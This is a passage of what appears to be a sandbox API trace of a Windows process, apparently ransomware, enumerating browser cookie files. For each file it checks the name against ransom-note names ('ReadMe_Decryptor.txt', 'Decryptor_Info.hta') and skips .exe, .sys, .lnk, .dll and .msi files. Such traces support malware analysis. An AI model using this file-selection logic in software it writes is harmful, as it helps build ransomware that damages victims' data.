hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53c70990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53c70990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x53c70990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x52, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtr02[1].txt", cAlternateFileName="5P5NRG~3.TXT")) returned 1 [0084.091] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2=".") returned 1 [0084.091] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="..") returned 1 [0084.091] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.091] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.092] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adtr02[1].txt") returned=".txt" [0084.092] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.092] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.092] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.092] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.092] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.092] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.092] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.092] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.092] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77df70 [0084.092] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.092] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x517fd8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51332930, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x51332930, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@advertising[1].txt", cAlternateFileName="5P5NRG~1.TXT")) returned 1 [0084.092] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2=".") returned 1 [0084.092] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="..") returned 1 [0084.092] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.093] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.093] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@advertising[1].txt") returned=".txt" [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.093] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.093] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.093] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.093] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77e058 [0084.093] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.093] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54cce0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54cce0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54cce0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@api.bing[2].txt", cAlternateFileName="5P40FC~1.TXT")) returned 1 [0084.093] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2=".") returned 1 [0084.093] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="..") returned 1 [0084.093] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.093] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.093] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@api.bing[2].txt") returned=".txt" [0084.093] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.094] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.094] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.094] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.094] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77e150 [0084.094] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.094] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4611db50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4611db50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x4611db50, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", cAlternateFileName="5P74F0~1.TXT")) returned 1 [0084.094] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2=".") returned 1 [0084.094] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="..") returned 1 [0084.094] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.094] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.094] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@at.atwola[1].txt") returned=".txt" [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.094] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77e248 [0084.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.095] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x534b4210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x562c6900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x562c6900, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@bing[1].txt", cAlternateFileName="5PBE12~1.TXT")) returned 1 [0084.095] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2=".") returned 1 [0084.095] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="..") returned 1 [0084.095] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.095] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.095] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@bing[1].txt") returned=".txt" [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.095] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.095] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e340 [0084.096] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.096] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45798350, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.bing[1].txt", cAlternateFileName="5P5NRG~2.TXT")) returned 1 [0084.096] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2=".") returned 1 [0084.096] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="..") returned 1 [0084.096] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.096] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.096] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@c.bing[1].txt") returned=".txt" [0084.096] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.096] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.096] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.096] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.096] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.096] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.096] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.096] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.096] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e428 [0084.096] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.096] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbdf95770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbdf95770, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbdf95770, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x82, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.msn[1].txt", cAlternateFileName="5PB89C~1.TXT")) returned 1 [0084.096] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2=".") returned 1 [0084.096] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="..") returned 1 [0084.096] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.097] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.097] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@c.msn[1].txt") returned=".txt" [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e510 [0084.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.097] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6301df20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63a15b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63a15b40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", cAlternateFileName="5P93CC~1.TXT")) returned 1 [0084.097] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2=".") returned 1 [0084.097] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="..") returned 1 [0084.097] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.097] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.097] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@doubleclick[2].txt") returned=".txt" [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.097] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.098] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77e5f8 [0084.098] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.098] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61093ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61093ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61093ba0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[1].txt", cAlternateFileName="5P12F9~1.TXT")) returned 1 [0084.098] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2=".") returned 1 [0084.098] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="..") returned 1 [0084.098] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.098] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.098] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@google[1].txt") returned=".txt" [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.098] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e6f0 [0084.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.099] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x610b9d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61282d80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61282d80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[3].txt", cAlternateFileName="5P692F~1.TXT")) returned 1 [0084.099] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2=".") returned 1 [0084.099] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="..") returned 1 [0084.099] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.099] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.099] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@google[3].txt") returned=".txt" [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.099] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e7d8 [0084.100] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.100] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e777a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64e777a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64e777a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x21f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[4].txt", cAlternateFileName="5P3B8C~1.TXT")) returned 1 [0084.100] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2=".") returned 1 [0084.100] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="..") returned 1 [0084.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.100] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@google[4].txt") returned=".txt" [0084.100] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.100] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.100] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.100] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.100] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.100] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e8d8 [0084.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.101] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x465ba5f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x465ba5f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x465ba5f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@linkedin[1].txt", cAlternateFileName="5P1C80~1.TXT")) returned 1 [0084.101] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".") returned 1 [0084.101] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="..") returned 1 [0084.101] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.101] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.101] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned=".txt" [0084.101] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.101] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.101] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.101] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.101] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7808c0 [0084.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.102] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbfa5cef0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbfa5cef0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbfa5cef0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x76, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", cAlternateFileName="5PD7A3~1.TXT")) returned 1 [0084.102] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2=".") returned 1 [0084.102] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="..") returned 1 [0084.102] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.102] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.102] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned=".txt" [0084.102] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.102] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.102] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.102] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.194] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.194] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7809b8 [0084.194] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.194] FindNextFileW 